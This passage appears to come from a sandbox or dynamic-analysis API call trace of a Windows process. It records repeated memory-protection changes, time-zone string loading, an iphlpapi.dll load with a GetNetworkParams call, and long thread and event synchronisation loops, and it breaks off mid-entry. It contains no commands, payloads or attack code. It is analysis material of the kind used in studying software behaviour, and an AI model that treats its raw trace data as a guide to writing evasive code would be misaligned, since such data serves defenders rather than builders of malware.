| out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.983] GetCurrentProcess () returned 0xffffffff [0115.983] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x7714035c, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.983] GetCurrentProcess () returned 0xffffffff [0115.983] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x7714036c, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.983] GetCurrentProcess () returned 0xffffffff [0115.983] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x7714036c, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.984] GetCurrentProcess () returned 0xffffffff [0115.984] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x771403c0, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.984] GetCurrentProcess () returned 0xffffffff [0115.984] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x771403c0, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.984] GetCurrentProcess () returned 0xffffffff [0115.984] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x7714044c, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.984] GetCurrentProcess () returned 0xffffffff [0115.984] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x7714044c, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.985] GetCurrentProcess () returned 0xffffffff [0115.985] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x77140454, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.985] GetCurrentProcess () returned 0xffffffff [0115.985] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x77140454, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.985] GetCurrentProcess () returned 0xffffffff [0115.985] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x77140488, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.985] GetCurrentProcess () returned 0xffffffff [0115.985] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x77140488, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.986] GetCurrentProcess () returned 0xffffffff [0115.986] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x771404e0, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.986] GetCurrentProcess () returned 0xffffffff [0115.986] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x771404e0, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.986] GetCurrentProcess () returned 0xffffffff [0115.986] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x771404e4, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.987] GetCurrentProcess () returned 0xffffffff [0115.987] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x771404e4, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.987] GetCurrentProcess () returned 0xffffffff [0115.987] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x771404e8, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x20) returned 0x0 [0115.987] GetCurrentProcess () returned 0xffffffff [0115.987] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x771404e8, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x20, OldAccessProtection=0x6edac8 | out: BaseAddress=0x6eda90*=0x77140000, NumberOfBytesToProtect=0x6eda94, OldAccessProtection=0x6edac8*=0x4) returned 0x0 [0115.988] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringW") returned 0x77148eb9 [0115.988] CoTaskMemAlloc (cb=0x3ec) returned 0xbc5c10 [0115.988] LoadStringW (in: hInstance=0x2100001, uID=0x29e, lpBuffer=0xbc5c10, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0115.988] CoTaskMemFree (pv=0xbc5c10) [0115.988] FreeLibrary (hLibModule=0x2100001) returned 1 [0115.989] CoTaskMemAlloc (cb=0x20c) returned 0xbc5c10 [0115.989] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbc5c10 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0115.989] CoTaskMemFree (pv=0xbc5c10) [0115.989] CoTaskMemAlloc (cb=0x20c) returned 0xbc5c10 [0115.989] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x6ee758, pwszFileMUIPath=0xbc5c10, pcchFileMUIPath=0x6ee75c, pululEnumerator=0x6ee750 | out: pwszLanguage=0x0, pcchLanguage=0x6ee758, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x6ee75c, pululEnumerator=0x6ee750) returned 1 [0115.989] CoTaskMemFree (pv=0x0) [0115.989] CoTaskMemFree (pv=0xbc5c10) [0115.989] SysReAllocStringLen (in: pbstr=0x6ee678*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x6ee678*="tzres.dll.mui") returned 1 [0115.990] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0115.990] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2100001 [0115.990] GetLastError () returned 0x0 [0115.990] CoTaskMemAlloc (cb=0x3ec) returned 0xbc5c10 [0115.990] LoadStringW (in: hInstance=0x2100001, uID=0x2a0, lpBuffer=0xbc5c10, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0115.990] CoTaskMemFree (pv=0xbc5c10) [0115.990] FreeLibrary (hLibModule=0x2100001) returned 1 [0115.991] CoTaskMemAlloc (cb=0x20c) returned 0xbc5c10 [0115.991] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbc5c10 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0115.991] CoTaskMemFree (pv=0xbc5c10) [0115.991] CoTaskMemAlloc (cb=0x20c) returned 0xbc5c10 [0115.991] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x6ee758, pwszFileMUIPath=0xbc5c10, pcchFileMUIPath=0x6ee75c, pululEnumerator=0x6ee750 | out: pwszLanguage=0x0, pcchLanguage=0x6ee758, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x6ee75c, pululEnumerator=0x6ee750) returned 1 [0115.991] CoTaskMemFree (pv=0x0) [0115.992] CoTaskMemFree (pv=0xbc5c10) [0115.992] SysReAllocStringLen (in: pbstr=0x6ee678*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x6ee678*="tzres.dll.mui") returned 1 [0115.992] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0115.992] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2100001 [0115.992] GetLastError () returned 0x0 [0115.992] CoTaskMemAlloc (cb=0x3ec) returned 0xbc5c10 [0115.993] LoadStringW (in: hInstance=0x2100001, uID=0x29f, lpBuffer=0xbc5c10, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0115.993] CoTaskMemFree (pv=0xbc5c10) [0115.993] FreeLibrary (hLibModule=0x2100001) returned 1 [0115.993] RegCloseKey (hKey=0x42c) returned 0x0 [0115.993] SetEvent (hEvent=0x2e8) returned 1 [0115.999] SysReAllocStringLen (in: pbstr=0x6edc9c*=0x0, psz="iphlpapi.dll", len=0xc | out: pbstr=0x6edc9c*="iphlpapi.dll") returned 1 [0115.999] CharLowerBuffW (in: lpsz="iphlpapi.dll", cchLength=0xc | out: lpsz="iphlpapi.dll") returned 0xc [0115.999] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0115.999] GetLastError () returned 0x7e [0115.999] SetLastError (dwErrCode=0x7e) [0116.003] SysReAllocStringLen (in: pbstr=0x6edc9c*=0x0, psz="iphlpapi.dll", len=0xc | out: pbstr=0x6edc9c*="iphlpapi.dll") returned 1 [0116.003] CharLowerBuffW (in: lpsz="iphlpapi.dll", cchLength=0xc | out: lpsz="iphlpapi.dll") returned 0xc [0116.003] LoadLibraryExW (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x0) returned 0x74590000 [0116.003] GetLastError () returned 0x0 [0116.003] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edc84*=0x745911bc, NumberOfBytesToProtect=0x6edc88, NewAccessProtection=0x4, OldAccessProtection=0x6edcbc | out: BaseAddress=0x6edc84*=0x74591000, NumberOfBytesToProtect=0x6edc88, OldAccessProtection=0x6edcbc*=0x20) returned 0x0 [0116.004] GetCurrentProcess () returned 0xffffffff [0116.004] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edc84*=0x745911bc, NumberOfBytesToProtect=0x6edc88, NewAccessProtection=0x20, OldAccessProtection=0x6edcbc | out: BaseAddress=0x6edc84*=0x74591000, NumberOfBytesToProtect=0x6edc88, OldAccessProtection=0x6edcbc*=0x4) returned 0x0 [0116.004] GetCurrentProcess () returned 0xffffffff [0116.004] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edc84*=0x745911c8, NumberOfBytesToProtect=0x6edc88, NewAccessProtection=0x4, OldAccessProtection=0x6edcbc | out: BaseAddress=0x6edc84*=0x74591000, NumberOfBytesToProtect=0x6edc88, OldAccessProtection=0x6edcbc*=0x20) returned 0x0 [0116.004] GetCurrentProcess () returned 0xffffffff [0116.004] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edc84*=0x745911c8, NumberOfBytesToProtect=0x6edc88, NewAccessProtection=0x20, OldAccessProtection=0x6edcbc | out: BaseAddress=0x6edc84*=0x74591000, NumberOfBytesToProtect=0x6edc88, OldAccessProtection=0x6edcbc*=0x4) returned 0x0 [0116.005] GetProcAddress (hModule=0x74590000, lpProcName="GetNetworkParams") returned 0x74598918 [0116.005] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x6ee96c | out: pFixedInfo=0x0, pOutBufLen=0x6ee96c) returned 0x6f [0116.381] GetCurrentThreadId () returned 0xb0c [0116.381] ResetEvent (hEvent=0xb8) returned 1 [0116.381] GetCurrentThreadId () returned 0xb0c [0116.381] GetCurrentThreadId () returned 0xb0c [0116.381] GetCurrentThreadId () returned 0xb0c [0116.381] GetCurrentThreadId () returned 0xb0c [0116.381] ResetEvent (hEvent=0xb8) returned 1 [0116.381] GetCurrentThreadId () returned 0xb0c [0116.381] GetCurrentThreadId () returned 0xb0c [0116.381] SetEvent (hEvent=0xbc) returned 1 [0116.381] SetEvent (hEvent=0xb8) returned 1 [0116.381] CloseHandle (hObject=0x440) returned 1 [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] ResetEvent (hEvent=0xb8) returned 1 [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] ResetEvent (hEvent=0xb8) returned 1 [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] SetEvent (hEvent=0xbc) returned 1 [0116.382] SetEvent (hEvent=0xb8) returned 1 [0116.382] CloseHandle (hObject=0x440) returned 1 [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] ResetEvent (hEvent=0xb8) returned 1 [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] ResetEvent (hEvent=0xb8) returned 1 [0116.382] GetCurrentThreadId () returned 0xb0c [0116.382] GetCurrentThreadId () returned 0xb0c [0116.383] SetEvent (hEvent=0xbc) returned 1 [0116.383] SetEvent (hEvent=0xb8) returned 1 [0116.383] CloseHandle (hObject=0x440) returned 1 [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] ResetEvent (hEvent=0xb8) returned 1 [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] ResetEvent (hEvent=0xb8) returned 1 [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] SetEvent (hEvent=0xbc) returned 1 [0116.383] SetEvent (hEvent=0xb8) returned 1 [0116.383] CloseHandle (hObject=0x440) returned 1 [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] ResetEvent (hEvent=0xb8) returned 1 [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] GetCurrentThreadId () returned 0xb0c [0116.383] GetCurrentThreadId () returned 0xb0c [0116.384] ResetEvent (hEvent=0xb8) returned 1 [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] SetEvent (hEvent=0xbc) returned 1 [0116.384] SetEvent (hEvent=0xb8) returned 1 [0116.384] CloseHandle (hObject=0x440) returned 1 [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] ResetEvent (hEvent=0xb8) returned 1 [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] ResetEvent (hEvent=0xb8) returned 1 [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] SetEvent (hEvent=0xbc) returned 1 [0116.384] SetEvent (hEvent=0xb8) returned 1 [0116.384] CloseHandle (hObject=0x440) returned 1 [0116.384] GetCurrentThreadId () returned 0xb0c [0116.384] ResetEvent (hEvent=0xb8) returned 1 [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] ResetEvent (hEvent=0xb8) returned 1 [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] SetEvent (hEvent=0xbc) returned 1 [0116.385] SetEvent (hEvent=0xb8) returned 1 [0116.385] CloseHandle (hObject=0x440) returned 1 [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] ResetEvent (hEvent=0xb8) returned 1 [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] ResetEvent (hEvent=0xb8) returned 1 [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] GetCurrentThreadId () returned 0xb0c [0116.385] SetEvent (hEvent=0xbc) returned 1 [0116.385] SetEvent (hEvent=0xb8) returned 1 [0116.385] CloseHandle (hObject=0x440) returned 1 [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] ResetEvent (hEvent=0xb8) returned 1 [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] ResetEvent (hEvent=0xb8) returned 1 [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] SetEvent (hEvent=0xbc) returned 1 [0116.386] SetEvent (hEvent=0xb8) returned 1 [0116.386] CloseHandle (hObject=0x440) returned 1 [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] ResetEvent (hEvent=0xb8) returned 1 [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] ResetEvent (hEvent=0xb8) returned 1 [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] GetCurrentThreadId () returned 0xb0c [0116.386] SetEvent (hEvent=0xbc) returned 1 [0116.386] SetEvent (hEvent=0xb8) returned 1 [0116.387] CloseHandle (hObject=0x440) returned 1 [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] ResetEvent (hEvent=0xb8) returned 1 [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] ResetEvent (hEvent=0xb8) returned 1 [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] SetEvent (hEvent=0xbc) returned 1 [0116.387] SetEvent (hEvent=0xb8) returned 1 [0116.387] CloseHandle (hObject=0x440) returned 1 [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] ResetEvent (hEvent=0xb8) returned 1 [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] ResetEvent (hEvent=0xb8) returned 1 [0116.387] GetCurrentThreadId () returned 0xb0c [0116.387] GetCurrentThreadId () returned 0xb0c [0116.388] SetEvent (hEvent=0xbc) returned 1 [0116.388] SetEvent (hEvent=0xb8) returned 1 [0116.388] CloseHandle (hObject=0x440) returned 1 [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] ResetEvent (hEvent=0xb8) returned 1 [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] ResetEvent (hEvent=0xb8) returned 1 [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] SetEvent (hEvent=0xbc) returned 1 [0116.388] SetEvent (hEvent=0xb8) returned 1 [0116.388] CloseHandle (hObject=0x440) returned 1 [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] ResetEvent (hEvent=0xb8) returned 1 [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] GetCurrentThreadId () returned 0xb0c [0116.388] ResetEvent (hEvent=0xb8) returned 1 [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] SetEvent (hEvent=0xbc) returned 1 [0116.389] SetEvent (hEvent=0xb8) returned 1 [0116.389] CloseHandle (hObject=0x440) returned 1 [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] ResetEvent (hEvent=0xb8) returned 1 [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] ResetEvent (hEvent=0xb8) returned 1 [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] SetEvent (hEvent=0xbc) returned 1 [0116.389] SetEvent (hEvent=0xb8) returned 1 [0116.389] CloseHandle (hObject=0x440) returned 1 [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] ResetEvent (hEvent=0xb8) returned 1 [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] GetCurrentThreadId () returned 0xb0c [0116.389] GetCurrentThreadId () returned 0xb0c [0116.390] ResetEvent (hEvent=0xb8) returned 1 [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] SetEvent (hEvent=0xbc) returned 1 [0116.390] SetEvent (hEvent=0xb8) returned 1 [0116.390] CloseHandle (hObject=0x440) returned 1 [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] ResetEvent (hEvent=0xb8) returned 1 [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] ResetEvent (hEvent=0xb8) returned 1 [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] SetEvent (hEvent=0xbc) returned 1 [0116.390] SetEvent (hEvent=0xb8) returned 1 [0116.390] CloseHandle (hObject=0x440) returned 1 [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] ResetEvent (hEvent=0xb8) returned 1 [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] GetCurrentThreadId () returned 0xb0c [0116.390] GetCurrentThreadId () returned 0xb0c [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] ResetEvent (hEvent=0xb8) returned 1 [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] SetEvent (hEvent=0xbc) returned 1 [0116.391] SetEvent (hEvent=0xb8) returned 1 [0116.391] CloseHandle (hObject=0x440) returned 1 [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] ResetEvent (hEvent=0xb8) returned 1 [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] ResetEvent (hEvent=0xb8) returned 1 [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] GetCurrentThreadId () returned 0xb0c [0116.391] SetEvent (hEvent=0xbc) returned 1 [0116.391] SetEvent (hEvent=0xb8) returned 1 [0116.391] CloseHandle (hObject=0x440) returned 1 [0116.392] GetCurrentThreadId () returned 0xb0c [0116.392] ResetEvent (hEvent=0xb8) returned 1 [0116.392] GetCurrentThreadId () returned 0xb0c [0116.392] GetCurrentThreadId () returned 0xb0c [0116.392] GetCurrentThreadId () returned 0xb0c [0116.392] GetCurrentThreadId () returned 0xb0c [0116.392] ResetEvent (hEvent=0xb8) returned 1 [0116.393] GetCurrentThreadId () returned 0xb0c [0116.393] GetCurrentThreadId () returned 0xb0c [0116.393] SetEvent (hEvent=0xbc) returned 1 [0116.393] SetEvent (hEvent=0xb8) returned 1 [0116.393] CloseHandle (hObject=0x444) returned 1 [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] ResetEvent (hEvent=0xb8) returned 1 [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] ResetEvent (hEvent=0xb8) returned 1 [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] SetEvent (hEvent=0xbc) returned 1 [0116.396] SetEvent (hEvent=0xb8) returned 1 [0116.396] CloseHandle (hObject=0x444) returned 1 [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] ResetEvent (hEvent=0xb8) returned 1 [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] GetCurrentThreadId () returned 0xb0c [0116.396] GetCurrentThreadId () returned 0xb0c [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] ResetEvent (hEvent=0xb8) returned 1 [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] SetEvent (hEvent=0xbc) returned 1 [0116.397] SetEvent (hEvent=0xb8) returned 1 [0116.397] CloseHandle (hObject=0x444) returned 1 [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] ResetEvent (hEvent=0xb8) returned 1 [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] ResetEvent (hEvent=0xb8) returned 1 [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] SetEvent (hEvent=0xbc) returned 1 [0116.397] SetEvent (hEvent=0xb8) returned 1 [0116.397] CloseHandle (hObject=0x444) returned 1 [0116.397] GetCurrentThreadId () returned 0xb0c [0116.397] ResetEvent (hEvent=0xb8) returned 1 [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] ResetEvent (hEvent=0xb8) returned 1 [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] SetEvent (hEvent=0xbc) returned 1 [0116.398] SetEvent (hEvent=0xb8) returned 1 [0116.398] CloseHandle (hObject=0x444) returned 1 [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] ResetEvent (hEvent=0xb8) returned 1 [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] ResetEvent (hEvent=0xb8) returned 1 [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] GetCurrentThreadId () returned 0xb0c [0116.398] SetEvent (hEvent=0xbc) returned 1 [0116.398] SetEvent (hEvent=0xb8) returned 1 [0116.398] CloseHandle (hObject=0x444) returned 1 [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] ResetEvent (hEvent=0xb8) returned 1 [0116.399] GetCurrentThreadId 